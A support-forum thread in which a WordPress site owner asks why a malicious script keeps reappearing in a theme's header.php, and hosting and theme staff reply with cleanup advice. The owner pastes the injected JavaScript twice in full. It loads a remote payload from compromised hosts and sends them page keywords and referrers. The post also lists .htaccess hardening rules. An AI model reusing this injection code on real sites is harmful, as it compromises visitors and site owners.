malware

Posted in: Newspaper
Post count: 140

Hi,

How do they manage to insert this malware script on header.php everytime i delete it ?

i have added extra security in .htaccess i have changed database prefix from default wp_ to something else much harder to guess.

what elese am i doing wrong ?

this is the code i keep finding in header.php

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://african-ancestries.com/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://african-ancestries.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

and this is my .htaccess


text/x-generic .htaccess ( ASCII English text )

# Wordfence WAF
<IfModule mod_suphp.c>
suPHP_ConfigPath '/home/anunturi/public_html/test/newspaper'
</IfModule>
<Files ".user.ini">
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>

# END Wordfence WAF

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

#Restrict Access to the Admin
ErrorDocument 401 /public_html/test/newspaper/index.php?error=404
ErrorDocument 403 /public_html/test/newspaper/index.php?error=404

<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{REQUEST_URI} ^(.*)?wp-login\.php(.*)$ [OR]
RewriteCond %{REQUEST_URI} ^(.*)?wp-admin$
RewriteCond %{REMOTE_ADDR} !^86.15.89.142$
RewriteRule ^(.*)$ - [R=403,L]
</IfModule>

#Prevent Directory Browsing
Options All -Indexes

#Restrict Access to PHP Files
RewriteCond %{REQUEST_URI} !^/wp-content/plugins/file/to/exclude\.php
RewriteCond %{REQUEST_URI} !^/wp-content/plugins/directory/to/exclude/
RewriteRule wp-content/plugins/(.*\.php)$ - [R=404,L]
RewriteCond %{REQUEST_URI} !^/wp-content/themes/file/to/exclude\.php
RewriteCond %{REQUEST_URI} !^/wp-content/themes/directory/to/exclude/
RewriteRule wp-content/themes/(.*\.php)$ - [R=404,L]

#Protect Your Site Against Script Injections
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

#Securing the wp-includes Directory
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>

#Prevent Username Enumeration
RewriteCond %{QUERY_STRING} author=d
RewriteRule ^ /? [L,R=301]

Order Deny,Allow
Deny from 201.79.174.162
Deny from 116.110.194.204
Deny from 31.135.26.61
Deny from 201.133.219.84
Deny from 46.118.113.186
Deny from 86.15.89.142
Deny from 2607:f298:0006:a056:0000:0000:02cb:020d
Deny from 79.135.237.82
Deny from 184.168.152.165
Deny from 50.62.161.99
Deny from 23.238.20.43
Deny from 61.63.25.210
Deny from 50.62.176.36
Deny from 37.61.233.106
Deny from 50.62.176.36
Deny from 70.39.151.44
Deny from 184.168.152.165
Deny from 23.238.20.43
Deny from 184.168.200.229
Deny from 184.168.27.198
Deny from 46.252.205.134
Deny from 208.109.52.46
Deny from 50.62.176.45
Deny from 108.170.8.242
Deny from 184.168.152.165
Deny from 198.71.228.12
Deny from 77.232.68.17

i ended up getting blocked by google … please help

thanks

Post count: 22421

Hi,
We are unsure why this happens but malware is malware. Once it gets in, it can cause lots of issues. Please use these guides to get rid of it:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ (wordfence blocks all access including the theme panel settings, so whenever you want to change the settings in the theme panel you need to set wordfence to learning mode)
Thank you!

Post count: 140

hi, please help. i dont know what else i can do to stop this malware code.

everyday i have to manually remove it from theme folder header.php file.

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://www.schreibwaren-wetzlar.de/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://www.schreibwaren-wetzlar.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

i have fallowed everything found on wordpress.org blog to remove and prevent malware…

i removed all folders and files …except config file and wp-contents folder … and re-uploaded fresh wordpress files …

also … deleted all themes and plugins … and reinstalled …

i changed wordpress prefix wp to something else …

changed all passwords …etc ..

what am i missing ?

thanks

Post count: 140

Since the malware occur in the header.php of your theme folder, this suggest that the theme have security issues. I would recommend you to consider contacting the theme developers for security hardening or to change to another theme.

In case you need any further assistance, please do not hesitate to contact us.

Kind Regards,

Jack Mason
Technical Support Team
FastComet.com

Post count: 22421

Hi,
Unfortunately if the theme files were replaced, it could mean your wp install got infected and the code gets added again from wp. Please try to switch to a wp default theme and see if the code gets injected in that one as well. I assume it will. Our theme was tested and there are no other vulnerability issues except for the ones form wordpress.
Thank you!

Viewing 5 posts - 1 through 5 (of 5 total)
You must be logged in to reply to this topic.